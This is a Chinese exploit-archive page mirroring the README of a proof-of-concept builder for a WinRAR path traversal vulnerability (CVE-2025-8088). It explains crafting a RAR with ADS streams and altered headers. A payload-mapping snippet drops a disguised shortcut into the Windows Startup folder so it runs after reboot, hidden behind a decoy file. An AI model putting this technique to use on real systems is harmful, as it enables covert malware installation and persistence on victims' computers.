支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:752

75.2%
立即捐款

POC详情: 84fa7f9578a94858044f5468e59de6bc0c05502d

来源
https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder
关联漏洞
标题:WinRAR 安全漏洞 (CVE-2025-8088)
描述:WinRAR是WinRAR公司的一款文件压缩器。该产品支持RAR、ZIP等格式文件的压缩和解压等。 WinRAR存在安全漏洞,该漏洞源于路径遍历问题,可能导致任意代码执行。
描述
A POC exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower
介绍
# CVE-2025-8088-WinRAR-builder
A POC exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower

## 🚀 How It Works

1. Creates a Rar embed with other payloads
2. Using Multiple ADS Streams 🔄 - Attaches payload streams with different path traversal depths
3. Manipulates RAR Headers ⚙️ - Modifies archive structure to exploit path traversal vulnerability
4. Drops Payload to Startup 📂 - Attempts to write payload to Windows startup folder when extracted

## 🛠️ Usage

1. Clone the repository
```bash
git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder
```

2. Prepare payloads
```
mkdir payloads
```
- Add our payloads to that folder (exe, dll, lnk, ...)
- Modify `PAYLOAD_MAPPING` in the script
```python
# 2. Map our payload to corresponding destination
#   Format: (filename_in_payloads_dir, target_extract_dest)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
    # Payload 1
    ("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),

    # Payload 2
    ("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),

    # Payload 3
    # Add your own    
]
```

3. Run the exploit
```
python builder.py <decoy_file>
```

## 🔄 Execution Flow
1. Victim extracts the RAR with vulnerable WinRAR (≤7.12)
2. Payload gets written to destination folder, e.g. :
   ```bash
   AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
   ```
3. On next reboot ➡️ payload executes automatically

## 📋 Requirements
- Windows OS 🪟
- Python 3.x 🐍
- WinRAR installed
文件快照

 [4.0K]  /data/pocs/84fa7f9578a94858044f5468e59de6bc0c05502d
├── [ 10K]  builder.py
└── [1.6K]  README.md

1 directory, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。